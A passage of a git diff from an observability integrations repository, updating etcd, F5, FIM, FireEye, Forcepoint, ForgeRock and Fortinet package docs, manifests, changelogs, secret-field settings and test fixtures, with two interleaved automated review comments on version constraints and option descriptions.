@@ -2,20 +2,37 @@ This integration is used to collect metrics from [etcd v2 and v3 instances](https://etcd.io/). -It periodically fetches metrics from [etcd metrics APIs](https://etcd.io/docs/v3.1/op-guide/monitoring/). +It periodically fetches metrics from [etcd metrics APIs](https://etcd.io/docs/v3.5/op-guide/monitoring/). + +## Data streams + +For etcd v2, metrics are collected through the etcd v2 APIs, whereas for v3, they are fetched from the `/metrics` endpoint. + +When using v3, datasets are bundled within `metrics` data stream, while for v2, available datasets include `leader`, `self`, and `store`. + +etcd API endpoints: +- `/v2/stats/leader`: This endpoint provides metrics related to the current leadership status. Used by `leader` data stream. +- `/v2/stats/self`: Metrics exposed by this endpoint focus on the current node's status and performance. Used by `self` data stream. +- `/v2/stats/store`: This endpoint offers metrics related to the data storage layer, including data size, read/write operations, and storage efficiency. Used by `store` data stream. +- `/metrics` (v3 API): Unlike the more specific endpoints, this one provides a comprehensive set of metrics across various aspects of the system. Used by `metrics` data stream. + +The etcd v2 APIs are not enabled by default. However, you can enable etcd v2 APIs when using etcd v3 and above by utilizing the `--enable-v2` flag, provided it is supported. ## Compatibility The etcd package was tested with etcd `3.5.x`. -## Metrics +## Requirements -For etcd v2, metrics are collected through the etcd v2 APIs, whereas for v3, they are fetched from the `/metrics` endpoint. +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. 
-When using v3, datasets are bundled within `metrics` data stream, while for v2, available datasets include `leader`, `self`, and `store`. +In order to ingest data from etcd, you must know the instance host. + +Host Configuration Format: `http[s]://host:port` -The etcd v2 APIs are not enabled by default. However, you can enable etcd v2 APIs when using etcd v3 and above by utilizing the --enable-v2 flag, provided it is supported. +Example Host Configuration: `http://localhost:2379` +## Metrics reference ### metrics diff --git a/packages/etcd/changelog.yml b/packages/etcd/changelog.yml index 78954360b1b..e6f874d2357 100644 --- a/packages/etcd/changelog.yml +++ b/packages/etcd/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Update README to use documentation guidelines. + type: enhancement + link: https://github.com/elastic/integrations/pull/9286 - version: "1.0.0" changes: - description: Make etcd GA. diff --git a/packages/etcd/docs/README.md b/packages/etcd/docs/README.md index 163bc38ab09..bb8ca83de5a 100644 --- a/packages/etcd/docs/README.md +++ b/packages/etcd/docs/README.md 
@@ -2,20 +2,37 @@ This integration is used to collect metrics from [etcd v2 and v3 instances](https://etcd.io/). -It periodically fetches metrics from [etcd metrics APIs](https://etcd.io/docs/v3.1/op-guide/monitoring/). +It periodically fetches metrics from [etcd metrics APIs](https://etcd.io/docs/v3.5/op-guide/monitoring/). + +## Data streams + +For etcd v2, metrics are collected through the etcd v2 APIs, whereas for v3, they are fetched from the `/metrics` endpoint. + +When using v3, datasets are bundled within `metrics` data stream, while for v2, available datasets include `leader`, `self`, and `store`. + +etcd API endpoints: +- `/v2/stats/leader`: This endpoint provides metrics related to the current leadership status. Used by `leader` data stream. +- `/v2/stats/self`: Metrics exposed by this endpoint focus on the current node's status and performance. Used by `self` data stream. +- `/v2/stats/store`: This endpoint offers metrics related to the data storage layer, including data size, read/write operations, and storage efficiency. Used by `store` data stream. +- `/metrics` (v3 API): Unlike the more specific endpoints, this one provides a comprehensive set of metrics across various aspects of the system. Used by `metrics` data stream. + +The etcd v2 APIs are not enabled by default. However, you can enable etcd v2 APIs when using etcd v3 and above by utilizing the `--enable-v2` flag, provided it is supported. ## Compatibility The etcd package was tested with etcd `3.5.x`. -## Metrics +## Requirements -For etcd v2, metrics are collected through the etcd v2 APIs, whereas for v3, they are fetched from the `/metrics` endpoint. +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. 
-When using v3, datasets are bundled within `metrics` data stream, while for v2, available datasets include `leader`, `self`, and `store`. +In order to ingest data from etcd, you must know the instance host. + +Host Configuration Format: `http[s]://host:port` -The etcd v2 APIs are not enabled by default. However, you can enable etcd v2 APIs when using etcd v3 and above by utilizing the --enable-v2 flag, provided it is supported. +Example Host Configuration: `http://localhost:2379` +## Metrics reference ### metrics diff --git a/packages/etcd/manifest.yml b/packages/etcd/manifest.yml index 68de63f2b26..dba7e380087 100644 --- a/packages/etcd/manifest.yml +++ b/packages/etcd/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: etcd title: etcd -version: "1.0.0" +version: "1.0.1" description: Collect metrics from etcd instances with Elastic Agent. type: integration categories: diff --git a/packages/f5/_dev/deploy/docker/docker-compose.yml b/packages/f5/_dev/deploy/docker/docker-compose.yml index 280225dc997..00d5613c4ae 100644 --- a/packages/f5/_dev/deploy/docker/docker-compose.yml +++ b/packages/f5/_dev/deploy/docker/docker-compose.yml 
@@ -7,17 +7,15 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" f5-bigipapm-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9526 -p=udp /sample_logs/f5-bigipapm-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9526 -p=udp /sample_logs/f5-bigipapm-*.log f5-bigipapm-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9526 -p=tcp /sample_logs/f5-bigipapm-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9526 -p=tcp /sample_logs/f5-bigipapm-*.log f5-bigipafm-logfile: image: alpine volumes: @@ -25,14 +23,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" f5-bigipafm-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9544 -p=udp /sample_logs/f5-bigipafm-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9544 -p=udp /sample_logs/f5-bigipafm-*.log f5-bigipafm-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9544 -p=tcp /sample_logs/f5-bigipafm-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9544 -p=tcp /sample_logs/f5-bigipafm-*.log 
diff --git a/packages/f5_bigip/_dev/build/docs/README.md b/packages/f5_bigip/_dev/build/docs/README.md index 04e797a7ebe..59967b10182 100644 --- a/packages/f5_bigip/_dev/build/docs/README.md +++ b/packages/f5_bigip/_dev/build/docs/README.md @@ -4,7 +4,7 @@ The [F5 BIG-IP](https://www.f5.com/products/big-ip-services) integration allows users to monitor LTM, AFM, APM, ASM, and AVR activity. F5 BIG-IP covers software and hardware designed around application availability, access control, and security solutions. -Use the F5 BIG-IP integration to collect and parse data from F5 BIG-IP using **telemetry streaming** and then visualize that data in Kibana. +Use the F5 BIG-IP integration to collect and parse data from F5 BIG-IP using **telemetry streaming** and then visualize that data in Kibana. The integration currently only supports JSON-formatted telemetry data generated by following F5 features: LTM, AFM, APM, ASM, and AVR. Ingesting or parsing the **syslog events** produced at the operating system level is not supported. Use the [Custom Logs integration](https://docs.elastic.co/integrations/log) to ingest these system-level log messages instead. The F5 BIG-IP integration can be used in three different modes to collect data: - **HTTP Endpoint mode** - F5 BIG-IP pushes logs directly to an HTTP endpoint hosted by users’ Elastic Agent. diff --git a/packages/f5_bigip/changelog.yml b/packages/f5_bigip/changelog.yml index 8ba9b8cf198..74affb3b3b6 100644 --- a/packages/f5_bigip/changelog.yml +++ b/packages/f5_bigip/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Clarify the lack of support for syslog messages in README. + type: enhancement + link: https://github.com/elastic/integrations/pull/9510 +- version: "1.14.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.13.2" changes: - description: Changed owners 
diff --git a/packages/f5_bigip/docs/README.md b/packages/f5_bigip/docs/README.md index e2192df215b..d346b7066a1 100644 --- a/packages/f5_bigip/docs/README.md +++ b/packages/f5_bigip/docs/README.md @@ -4,7 +4,7 @@ The [F5 BIG-IP](https://www.f5.com/products/big-ip-services) integration allows users to monitor LTM, AFM, APM, ASM, and AVR activity. F5 BIG-IP covers software and hardware designed around application availability, access control, and security solutions. -Use the F5 BIG-IP integration to collect and parse data from F5 BIG-IP using **telemetry streaming** and then visualize that data in Kibana. +Use the F5 BIG-IP integration to collect and parse data from F5 BIG-IP using **telemetry streaming** and then visualize that data in Kibana. The integration currently only supports JSON-formatted telemetry data generated by following F5 features: LTM, AFM, APM, ASM, and AVR. Ingesting or parsing the **syslog events** produced at the operating system level is not supported. Use the [Custom Logs integration](https://docs.elastic.co/integrations/log) to ingest these system-level log messages instead. The F5 BIG-IP integration can be used in three different modes to collect data: - **HTTP Endpoint mode** - F5 BIG-IP pushes logs directly to an HTTP endpoint hosted by users’ Elastic Agent. diff --git a/packages/f5_bigip/manifest.yml b/packages/f5_bigip/manifest.yml index 34201e67618..d3d8b86c868 100644 --- a/packages/f5_bigip/manifest.yml +++ b/packages/f5_bigip/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: f5_bigip title: F5 BIG-IP -version: "1.13.2" +version: "1.15.0" description: Collect logs from F5 BIG-IP with Elastic Agent. type: integration categories: - security conditions: kibana: - version: ^7.17.0 || ^8.0.0 + version: ^8.12.0 elastic: subscription: basic screenshots: 
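Review bot: Narrowing `conditions.kibana.version` from `^7.17.0 || ^8.0.0` to `^8.12.0` removes every 7.17 and 8.0–8.11 deployment from the upgrade path, yet the 1.14.0 changelog entry on the preceding line records the change as `type: enhancement` with the description "Set sensitive values as secret." and says nothing about the new minimum. Unless the repository treats constraint bumps as non-breaking by convention, consider `type: breaking-change`, or at least extend the description, e.g. `Set sensitive values as secret; requires Kibana 8.12.0 or newer.` The `secret: true` and `type: password` changes themselves, in the `@@ -44`, `@@ -112` and `@@ -119` hunks on the next line, look correct, including `secret: false` on the header name, which is not sensitive.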
@@ -44,12 +44,14 @@ policy_templates: description: The header to check for a specific value specified by `secret.value`. required: false show_user: false + secret: false - name: secret_value type: password title: Secret Value description: The secret stored in the header name specified by `secret.header`. required: false show_user: false + secret: true - name: ssl type: yaml title: SSL Configuration @@ -112,6 +114,7 @@ policy_templates: required: false show_user: true description: First part of access key. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -119,13 +122,15 @@ policy_templates: required: false show_user: true description: Second part of access key. + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: shared_credential_file type: text title: Shared Credential File diff --git a/packages/fim/changelog.yml b/packages/fim/changelog.yml index 51d9dad7ae0..64a8f4f89df 100644 --- a/packages/fim/changelog.yml +++ b/packages/fim/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: New event sourcing backends added + type: enhancement + link: https://github.com/elastic/integrations/pull/8807 +- version: "1.14.2" + changes: + - description: capture root requirement + type: enhancement + link: https://github.com/elastic/integrations/issues/8647 - version: "1.14.1" changes: - description: Changed owners diff --git a/packages/fim/data_stream/event/agent/stream/file_integrity.yml.hbs b/packages/fim/data_stream/event/agent/stream/file_integrity.yml.hbs index e5a211125d2..54ae0c00429 100644 --- a/packages/fim/data_stream/event/agent/stream/file_integrity.yml.hbs +++ b/packages/fim/data_stream/event/agent/stream/file_integrity.yml.hbs 
@@ -5,6 +5,7 @@ paths: {{/each}} recursive: {{recursive}} scan_at_start: {{scan_at_start}} +backend: {{backend}} hash_types: {{#each hash_types as |hash i|}} - {{hash}} diff --git a/packages/fim/manifest.yml b/packages/fim/manifest.yml index a169e85352e..80265ed0784 100644 --- a/packages/fim/manifest.yml +++ b/packages/fim/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: fim title: "File Integrity Monitoring" -version: "1.14.1" +version: "1.15.0" description: "The File Integrity Monitoring integration reports filesystem changes in real time." type: integration categories: @@ -72,6 +72,22 @@ vars: required: false default: - sha1 + - name: backend + type: select + title: File Event Source + description: | + Forces a particular event source for file events on Linux. `fsnotify` does not provide + user information. + options: + - text: ebpf + value: ebpf + - text: fsnotify + value: fsnotify + - text: kprobes + value: kprobes + show_user: true + required: false + default: fsnotify - name: max_file_size type: text title: File size limit @@ -135,6 +151,9 @@ vars: Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. +agent: + privileges: + root: true owner: github: elastic/sec-linux-platform type: elastic diff --git a/packages/fireeye/_dev/deploy/docker/docker-compose.yml b/packages/fireeye/_dev/deploy/docker/docker-compose.yml index 3d930c02a79..2bee81f7d2f 100644 --- a/packages/fireeye/_dev/deploy/docker/docker-compose.yml +++ b/packages/fireeye/_dev/deploy/docker/docker-compose.yml 
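Review bot: The `backend` description in the `@@ -72` hunk only says that `fsnotify` does not provide user information; an operator choosing among the three options needs the rest of the trade-off, and the `@@ -135` hunk in the same file declares `agent.privileges.root: true` without saying why. Suggest expanding the description to state that the setting applies to Linux only, that `ebpf` and `kprobes` instrument the kernel and therefore depend on a supported kernel and on the root privilege now declared in the manifest, and that `fsnotify` (the default) is the portable choice that cannot attribute changes to a user — each claim to be checked against the file_integrity module documentation before landing. The `backend: {{backend}}` line added to `file_integrity.yml.hbs` in the `@@ -5` hunk is emitted unconditionally; that is fine while `default: fsnotify` holds, but confirm the module accepts the key on non-Linux agents where the option has no effect.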
@@ -7,14 +7,12 @@ services:
 - ${SERVICE_LOGS_DIR}:/var/log
 command: /bin/sh -c "cp /sample_logs/* /var/log/"
 fireeye-nx-log-udp:
- image: docker.elastic.co/observability/stream:v0.6.1
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=udp /sample_logs/fireeye-nx.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=udp /sample_logs/fireeye-nx.log
 fireeye-nx-log-tcp:
- image: docker.elastic.co/observability/stream:v0.6.1
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=tcp /sample_logs/fireeye-nx.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=tcp /sample_logs/fireeye-nx.log
diff --git a/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log b/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log
index a8930a3c74a..29a8c5d577d 100644
--- a/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log
+++ b/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log
@@ -12,4 +12,4 @@ {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:21.282370+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"http\",\"src_ip\":\"192.168.1.222\",\"src_port\":47220,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"tx_id\":2,\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_content_type\":\"application\\/json\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":729}}\n","meta_sip4":"192.168.1.99","meta_oml":598,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:03:27.260035+0000\",\"flow_id\":1312034511612776,\"iface\":\"pether3\",\"event_type\":\"http\",\"src_ip\":\"192.168.1.222\",\"src_port\":44191,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"tx_id\":15,\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_content_type\":\"application\\/json\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":318}}\n","meta_sip4":"192.168.1.99","meta_oml":599,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:03:28.132214+0000\",\"flow_id\":1312034511612776,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.100.31\",\"src_port\":5601,\"dest_ip\":\"192.168.1.222\",\"dest_port\":44191,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; 
x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_content_type\":\"application\\/json\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":318},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with very long lines, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"5a767f56dc36f6051d23ef803775e8e9\",\"stored\":false,\"size\":318,\"tx_id\":15}}\n","meta_sip4":"192.168.1.99","meta_oml":824,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-23T05:03:28.209311+0000\",\"flow_id\":1312034511612776,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.1.222\",\"src_port\":44191,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"51b856867e8f4ec089d623b92c81f128\",\"stored\":false,\"size\":107,\"tx_id\":16}}\n","meta_sip4":"192.168.1.99","meta_oml":747,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} \ No newline at end of file 
+{"rawmsg":"{\"timestamp\":\"2020-09-23T05:03:28.209311+0000\",\"flow_id\":1312034511612776,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.1.222\",\"src_port\":44191,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"51b856867e8f4ec089d623b92c81f128\",\"stored\":false,\"size\":107,\"tx_id\":16}}\n","meta_sip4":"192.168.1.99","meta_oml":747,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"}
diff --git a/packages/fireeye/changelog.yml b/packages/fireeye/changelog.yml
index d597b8ca06e..ed0e6d63b36 100644
--- a/packages/fireeye/changelog.yml
+++ b/packages/fireeye/changelog.yml
@@ -1,3 +1,8 @@
+- version: "1.22.0"
+ changes:
+ - description: Update manifest format version to v3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9402
 - version: "1.21.2"
 changes:
 - description: Changed owners
diff --git a/packages/fireeye/data_stream/nx/_dev/test/system/test-default-config.yml b/packages/fireeye/data_stream/nx/_dev/test/system/test-default-config.yml
index 0953c2c225a..bbab37637d5 100644
--- a/packages/fireeye/data_stream/nx/_dev/test/system/test-default-config.yml
+++ b/packages/fireeye/data_stream/nx/_dev/test/system/test-default-config.yml
@@ -5,3 +5,5 @@ data_stream:
 vars:
 paths:
 - "{{SERVICE_LOGS_DIR}}/fireeye-nx.log"
+assert:
+ hit_count: 15
diff --git a/packages/fireeye/data_stream/nx/_dev/test/system/test-tcp-config.yml b/packages/fireeye/data_stream/nx/_dev/test/system/test-tcp-config.yml
index 866517ffa75..61612538c63 100644
--- a/packages/fireeye/data_stream/nx/_dev/test/system/test-tcp-config.yml
+++ b/packages/fireeye/data_stream/nx/_dev/test/system/test-tcp-config.yml
@@ -5,3 +5,5 @@ data_stream:
 vars:
 tcp_host: 0.0.0.0
 tcp_port: 9523
+assert:
+ hit_count: 15
diff --git a/packages/fireeye/data_stream/nx/_dev/test/system/test-udp-config.yml b/packages/fireeye/data_stream/nx/_dev/test/system/test-udp-config.yml
index 62c97968aeb..b1d72234da7 100644
--- a/packages/fireeye/data_stream/nx/_dev/test/system/test-udp-config.yml
+++ b/packages/fireeye/data_stream/nx/_dev/test/system/test-udp-config.yml
@@ -5,3 +5,5 @@ data_stream:
 vars:
 udp_host: 0.0.0.0
 udp_port: 9523
+assert:
+ hit_count: 15
diff --git a/packages/fireeye/manifest.yml b/packages/fireeye/manifest.yml
index caf481ff154..3c2e746df22 100644
--- a/packages/fireeye/manifest.yml
+++ b/packages/fireeye/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.3"
 name: fireeye
 title: "FireEye Network Security"
-version: "1.21.2"
+version: "1.22.0"
 description: Collect logs from FireEye NX with Elastic Agent.
 type: integration
 categories:
diff --git a/packages/forcepoint_web/changelog.yml b/packages/forcepoint_web/changelog.yml
index b1b147afb79..77378378654 100644
--- a/packages/forcepoint_web/changelog.yml
+++ b/packages/forcepoint_web/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.8.0"
+ changes:
+ - description: Upgrade to package spec 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9238
 - version: "1.7.2"
 changes:
 - description: Changed owners
diff --git a/packages/forcepoint_web/data_stream/logs/manifest.yml b/packages/forcepoint_web/data_stream/logs/manifest.yml
index 8ba666e40fc..e8938e478dc 100644
--- a/packages/forcepoint_web/data_stream/logs/manifest.yml
+++ b/packages/forcepoint_web/data_stream/logs/manifest.yml
@@ -21,6 +21,7 @@ streams:
 required: true
 show_user: true
 default: '\"%{date}\",\"%{time}\",\"%{user}\",\"%{workstation}\",\"%{category}\",\"%{action}\",\"%{risk_class}\",\"%{policy_name}\",\"%{url}\",\"%{connection_ip}\",\"%{destination_ip}\",\"%{source_ip}\",\"%{threat_type}\",\"%{threat_name}\",\"%{user_agent_string}\",\"%{http_status_code}\",\"%{http_request_method}\"'
+ secret: false
 - name: tags
 type: text
 title: Tags
diff --git a/packages/forcepoint_web/manifest.yml b/packages/forcepoint_web/manifest.yml
index d5261e04d59..a1a653ccaf5 100644
--- a/packages/forcepoint_web/manifest.yml
+++ b/packages/forcepoint_web/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.3"
 name: forcepoint_web
 title: "Forcepoint Web Security"
-version: "1.7.2"
+version: "1.8.0"
 source:
 license: "Elastic-2.0"
 description: "Forcepoint Web Security"
diff --git a/packages/forgerock/changelog.yml b/packages/forgerock/changelog.yml
index 220e6b257fe..fa6a880c263 100644
--- a/packages/forgerock/changelog.yml
+++ b/packages/forgerock/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.15.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9127
 - version: "1.14.1"
 changes:
 - description: Changed owners
diff --git a/packages/forgerock/manifest.yml b/packages/forgerock/manifest.yml
index 547562465d8..d2556f58e9c 100644
--- a/packages/forgerock/manifest.yml
+++ b/packages/forgerock/manifest.yml
@@ -1,13 +1,13 @@
 name: forgerock
 title: "ForgeRock"
-version: "1.14.1"
+version: "1.15.0"
 description: Collect audit logs from ForgeRock with Elastic Agent.
 type: integration
-format_version: "3.0.0"
+format_version: "3.0.2"
 categories: ["security"]
 conditions:
 kibana:
- version: ^8.7.1
+ version: ^8.12.0
 screenshots:
 - src: /img/forgerock-dashboard.png
 title: ForgeRock Dashboard
@@ -52,17 +52,19 @@ policy_templates:
 required: false
 show_user: false
 - name: api_key
- type: text
+ type: password
 title: API Key
 multi: false
 required: true
 show_user: true
+ secret: true
 - name: api_secret
 type: password
 title: API Secret
 multi: false
 required: true
 show_user: true
+ secret: true
 - name: initial_interval
 type: text
 title: Initial Interval
diff --git a/packages/fortinet_fortiedr/changelog.yml b/packages/fortinet_fortiedr/changelog.yml
index 1b6c3c5282a..4ca07de908c 100644
--- a/packages/fortinet_fortiedr/changelog.yml
+++ b/packages/fortinet_fortiedr/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.15.0"
+ changes:
+ - description: Update package spec to 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9235
 - version: "1.14.2"
 changes:
 - description: Changed owners
diff --git a/packages/fortinet_fortiedr/manifest.yml b/packages/fortinet_fortiedr/manifest.yml
index 6e88e2888e4..ecbe146d966 100644
--- a/packages/fortinet_fortiedr/manifest.yml
+++ b/packages/fortinet_fortiedr/manifest.yml
@@ -1,9 +1,9 @@
 name: fortinet_fortiedr
 title: Fortinet FortiEDR Logs
-version: "1.14.2"
+version: "1.15.0"
 description: Collect logs from Fortinet FortiEDR instances with Elastic Agent.
 type: integration
-format_version: "3.0.0"
+format_version: "3.0.3"
 categories: ["security", "edr_xdr"]
 conditions:
 kibana:
diff --git a/packages/fortinet_fortigate/changelog.yml b/packages/fortinet_fortigate/changelog.yml
index 193d2a5dbb5..7fd36887138 100644
--- a/packages/fortinet_fortigate/changelog.yml
+++ b/packages/fortinet_fortigate/changelog.yml
@@ -1,4 +1,24 @@
 # newer versions go on top
+- version: "1.25.2"
+ changes:
+ - description: Fix parsing failed logins from https.
+ type: bugfix
+ link: https://github.com/elastic/integrations/issues/9245
+- version: "1.25.1"
+ changes:
+ - description: Ensure event.original matches the value of the message field.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9438
+- version: "1.25.0"
+ changes:
+ - description: Add more sanitization for unwanted characters.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9384
+- version: "1.24.0"
+ changes:
+ - description: Update package spec to 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9235
 - version: "1.23.2"
 changes:
 - description: Changed owners
diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json
new file mode 100644
index 00000000000..1a0d6b9ccf0
--- /dev/null
+++ b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json
@@ -0,0 +1,10 @@ +{ + "events": [ + { + "message": "<188>date=2020-04-23 time=12:17:48 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0316013056\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_blk\" level=\"warning\" vd=\"root\" eventtime=1587230269052907555 tz=\"-0500\" policyid=100602 sessionid=1234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=61930 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"blocked\" reqtype=\"direct\" url=\"/config/\" sentbyte=1152 rcvdbyte=1130 direction=\"outgoing\" msg=\"URL belongs to a denied category in policy\" method=\"domain\" cat=76 catdesc=\"Internet Telephony\"", + "event": { + "original": "{\\\"message\\\":\\\"<188>date=2020-04-23 time=12:17:48 devname=\\\"testswitch1\\\" devid=\\\"somerouterid\\\" logid=\\\"0316013056\\\" type=\\\"utm\\\" 